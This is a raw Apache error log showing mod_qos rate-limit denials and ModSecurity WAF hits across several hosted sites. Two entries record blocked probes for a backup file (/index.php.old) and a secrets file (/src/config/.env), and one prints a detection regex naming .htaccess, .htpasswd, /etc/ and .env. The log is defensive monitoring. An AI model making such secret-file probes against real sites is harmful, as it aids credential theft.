[Tue May 26 19:53:42.644744 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr0QAAAMw
[Tue May 26 19:53:42.645226 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr0gAAANc
[Tue May 26 19:53:42.773830 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr1wAAAPM
[Tue May 26 19:53:42.774281 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr2AAAANk
[Tue May 26 19:53:42.780417 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr3AAAANg
[Tue May 26 19:53:42.781018 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr3QAAAI4
[Tue May 26 19:53:42.787845 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr3gAAAOY
[Tue May 26 19:53:42.788559 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr3wAAAKU
[Tue May 26 19:53:42.788680 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKxQAAAD4
[Tue May 26 19:53:42.790989 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr4AAAAJU
[Tue May 26 19:53:42.794279 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr4QAAAKw
[Tue May 26 19:53:42.794838 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr4gAAAQI
[Tue May 26 19:53:42.812588 2026] [security2:error] [pid 86490:tid 86691] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/index.php.old"] [unique_id "ahWs7lZMwN0DpLVWo6Kr4wAAAMw"]
[Tue May 26 19:53:42.926649 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr5QAAAMM
[Tue May 26 19:53:42.929270 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr5gAAALM
[Tue May 26 19:53:42.932671 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr5wAAAPM
[Tue May 26 19:53:42.933772 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr6AAAANk
[Tue May 26 19:53:42.934874 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr6QAAANg
[Tue May 26 19:53:42.936151 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr6gAAAI4
[Tue May 26 19:53:42.938185 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr6wAAAPQ
[Tue May 26 19:53:42.938311 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKxgAAACo
[Tue May 26 19:53:42.944882 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr7AAAANI
[Tue May 26 19:53:42.949153 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr7QAAAMg
[Tue May 26 19:53:42.980961 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/src/config/.env"] [unique_id "ahWs7lZMwN0DpLVWo6Kr7gAAAJU"]
[Tue May 26 19:53:43.079100 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr8wAAANc
[Tue May 26 19:53:43.082850 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr9QAAAMM
[Tue May 26 19:53:43.084849 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr9gAAALM
[Tue May 26 19:53:43.085383 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr9wAAAPM
[Tue May 26 19:53:43.087295 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr-AAAANg
[Tue May 26 19:53:43.087301 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr-QAAANk
[Tue May 26 19:53:43.087703 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr-gAAAI4
[Tue May 26 19:53:43.088487 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs72DRMqfxdEDkoszKxwAAADU
[Tue May 26 19:53:43.091199 2026] [security2:error] [pid 86490:tid 86651] [client 188.130.142.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6Kr8QAAAKQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:53:43.093156 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr-wAAAOY
[Tue May 26 19:53:43.098568 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6Kr_AAAAIU
[Tue May 26 19:53:43.230120 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsAQAAAMM
[Tue May 26 19:53:43.231600 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsAgAAALM
[Tue May 26 19:53:43.232943 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsBAAAAPM
[Tue May 26 19:53:43.235169 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsBQAAANg
[Tue May 26 19:53:43.238312 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsBwAAAI4
[Tue May 26 19:53:43.238969 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsCAAAAI4
[Tue May 26 19:53:43.241430 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs72DRMqfxdEDkoszKyQAAABg
[Tue May 26 19:53:43.241495 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsCQAAAKQ
[Tue May 26 19:53:43.241776 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsCgAAANI
[Tue May 26 19:53:43.248431 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KsCwAAAQI
[Tue May 26 19:53:43.280101 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrVgAAAJk"]
[Tue May 26 19:53:43.280332 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7UqK9k_ZUB2Vp25EWwAAAZU"]
[Tue May 26 19:53:43.289420 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrUAAAAJI"]
[Tue May 26 19:53:43.291034 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrVQAAAOg"]
[Tue May 26 19:53:43.300607 2026] [security2:error] [pid 93867:tid 94017] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7ZCDfrjqoHpuuBKqwAAAAQ0"]
[Tue May 26 19:53:43.301618 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrVAAAAIg"]
[Tue May 26 19:53:43.308807 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrQAAAAM8"]
[Tue May 26 19:53:43.309818 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7WDRMqfxdEDkoszKjgAAAF4"]
[Tue May 26 19:53:43.321564 2026] [security2:error] [pid 93867:tid 94036] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7pCDfrjqoHpuuBKqzwAAASA"]
[Tue May 26 19:53:43.326242 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7UqK9k_ZUB2Vp25EXQAAAZc"]
[Tue May 26 19:53:43.328131 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrZwAAAMk"]
[Tue May 26 19:53:43.330935 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrZgAAAL8"]
[Tue May 26 19:53:43.331010 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7WDRMqfxdEDkoszKjwAAAFk"]
[Tue May 26 19:53:43.332048 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7WDRMqfxdEDkoszKjQAAAGA"]
[Tue May 26 19:53:43.342798 2026] [security2:error] [pid 86490:tid 86722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrWQAAAOs"]
[Tue May 26 19:53:43.363270 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKtgAAAFc"]
[Tue May 26 19:53:43.370147 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7kqK9k_ZUB2Vp25EZAAAAZw"]
[Tue May 26 19:53:43.371962 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrbgAAAN0"]
[Tue May 26 19:53:43.372462 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrdQAAAOw"]
[Tue May 26 19:53:43.386567 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrdAAAAOM"]
[Tue May 26 19:53:43.390895 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKsQAAAGY"]
[Tue May 26 19:53:43.394759 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KraAAAAO4"]
[Tue May 26 19:53:43.395084 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrkwAAAME"]
[Tue May 26 19:53:43.395176 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKuAAAAHY"]
[Tue May 26 19:53:43.403093 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKvAAAAF0"]
[Tue May 26 19:53:43.406936 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKsgAAADw"]
[Tue May 26 19:53:43.407908 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7UqK9k_ZUB2Vp25EXgAAAZg"]
[Tue May 26 19:53:43.413487 2026] [security2:error] [pid 93867:tid 94042] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7pCDfrjqoHpuuBKq0AAAASY"]
[Tue May 26 19:53:43.416999 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKugAAAFI"]
[Tue May 26 19:53:43.421361 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KraQAAAPY"]
[Tue May 26 19:53:43.422918 2026] [security2:error] [pid 86490:tid 86638] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrogAAAJc"]
[Tue May 26 19:53:43.430738 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrowAAAJ8"]
[Tue May 26 19:53:43.434239 2026] [security2:error] [pid 93867:tid 94051] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7pCDfrjqoHpuuBKq1gAAAS4"]
[Tue May 26 19:53:43.442227 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrqwAAAMA"]
[Tue May 26 19:53:43.444069 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKvwAAAAk"]
[Tue May 26 19:53:43.444761 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7kqK9k_ZUB2Vp25EZQAAAZ8"]
[Tue May 26 19:53:43.447889 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrmAAAAPA"]
[Tue May 26 19:53:43.810656 2026] [security2:error] [pid 93867:tid 94064] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq5QAAATQ"]
[Tue May 26 19:53:43.916429 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs72DRMqfxdEDkoszK3QAAAAM
[Tue May 26 19:53:43.916566 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs72DRMqfxdEDkoszK3AAAAGs
[Tue May 26 19:53:43.916705 2026] [qos:error] [pid 93867:tid 94146] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs75CDfrjqoHpuuBKq9AAAAVs
[Tue May 26 19:53:43.916850 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs72DRMqfxdEDkoszK3gAAADc
[Tue May 26 19:53:43.917121 2026] [qos:error] [pid 93868:tid 94325] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs70qK9k_ZUB2Vp25EcwAAAdI
